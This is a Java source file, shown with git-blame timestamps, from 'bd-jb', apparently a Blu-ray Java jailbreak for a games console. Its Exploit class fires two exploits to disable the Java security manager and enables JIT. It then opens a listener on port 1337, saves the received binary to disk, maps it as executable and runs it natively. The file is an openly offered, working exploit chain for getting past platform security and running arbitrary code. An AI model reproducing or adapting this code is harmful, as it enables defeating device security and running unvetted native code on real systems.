2021-10-24 11:23:44 -04:00
|
|
|
/*
|
|
|
|
* Copyright (C) 2021 Andy Nguyen
|
|
|
|
*
|
|
|
|
* This software may be modified and distributed under the terms
|
|
|
|
* of the MIT license. See the LICENSE file for details.
|
|
|
|
*/
|
|
|
|
|
|
|
|
package com.bdjb;
|
|
|
|
|
|
|
|
import java.io.FileOutputStream;
|
|
|
|
import java.io.InputStream;
|
|
|
|
import java.io.OutputStream;
|
2021-10-25 03:47:12 -04:00
|
|
|
import java.net.InetAddress;
|
2021-10-24 11:23:44 -04:00
|
|
|
import java.net.ServerSocket;
|
2021-10-27 12:14:29 -04:00
|
|
|
import java.net.Socket;
|
2021-10-24 11:23:44 -04:00
|
|
|
|
|
|
|
class Exploit implements Runnable {
|
|
|
|
static void init() {
|
|
|
|
Screen.println("[+] bd-jb by theflow");
|
|
|
|
|
|
|
|
Screen.println("[*] Disabling security manager...");
|
|
|
|
|
|
|
|
ExploitInterface[] exploits =
|
|
|
|
new ExploitInterface[] {new ExploitUserPrefsImpl(), new ExploitServiceProxyImpl()};
|
|
|
|
|
|
|
|
for (int i = 0; i < exploits.length; i++) {
|
|
|
|
try {
|
|
|
|
exploits[i].trigger();
|
|
|
|
if (System.getSecurityManager() == null) {
|
|
|
|
break;
|
|
|
|
}
|
|
|
|
} catch (Exception e) {
|
|
|
|
continue;
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
if (System.getSecurityManager() != null) {
|
|
|
|
Screen.println("[-] Error could not disable security manager.");
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
static void start() {
|
|
|
|
new Thread(new Exploit()).start();
|
|
|
|
}
|
|
|
|
|
|
|
|
public void run() {
|
|
|
|
if (System.getSecurityManager() != null) {
|
|
|
|
return;
|
|
|
|
}
|
|
|
|
|
|
|
|
try {
|
|
|
|
Screen.println("[*] Installing native API...");
|
|
|
|
API api = API.getInstance();
|
|
|
|
|
|
|
|
Screen.println("[*] Enabling JIT...");
|
|
|
|
JIT jit = JIT.getInstance();
|
|
|
|
|
2021-10-25 03:47:12 -04:00
|
|
|
Screen.println(
|
|
|
|
"[*] Listening for payload on "
|
|
|
|
+ InetAddress.getLocalHost().getHostAddress()
|
|
|
|
+ ":1337...");
|
2021-10-24 11:23:44 -04:00
|
|
|
|
|
|
|
ServerSocket serverSocket = new ServerSocket(1337);
|
|
|
|
Socket socket = serverSocket.accept();
|
|
|
|
|
|
|
|
Screen.println("[*] Downloading payload...");
|
|
|
|
|
|
|
|
InputStream inputStream = socket.getInputStream();
|
|
|
|
OutputStream outputStream = new FileOutputStream("/OS/HDD/download0/mnt_ada/payload.bin");
|
|
|
|
|
|
|
|
byte[] buf = new byte[8192];
|
|
|
|
int read;
|
|
|
|
while ((read = inputStream.read(buf)) > 0) {
|
|
|
|
outputStream.write(buf, 0, read);
|
|
|
|
}
|
|
|
|
|
|
|
|
outputStream.close();
|
|
|
|
inputStream.close();
|
|
|
|
|
|
|
|
socket.close();
|
|
|
|
|
2021-10-27 15:12:07 -04:00
|
|
|
Screen.println("[*] Mapping payload...");
|
2021-10-27 15:04:09 -04:00
|
|
|
long payload = jit.mapPayload("/OS/HDD/download0/mnt_ada/payload.bin", 0x4000);
|
2021-10-27 15:12:07 -04:00
|
|
|
Screen.println("[+] payload: " + Long.toHexString(payload));
|
|
|
|
|
|
|
|
Screen.println("[*] Executing payload...");
|
2021-10-25 03:47:12 -04:00
|
|
|
int ret = (int) api.call(payload, api.dlsym(API.LIBKERNEL_MODULE_HANDLE, "sceKernelDlsym"));
|
|
|
|
Screen.println("[+] Result: " + ret);
|
2021-10-24 11:23:44 -04:00
|
|
|
} catch (Exception e) {
|
2021-10-26 14:22:19 -04:00
|
|
|
Screen.println("[-] Error: " + e.getMessage());
|
2021-10-24 11:23:44 -04:00
|
|
|
}
|
|
|
|
}
|
|
|
|
}
|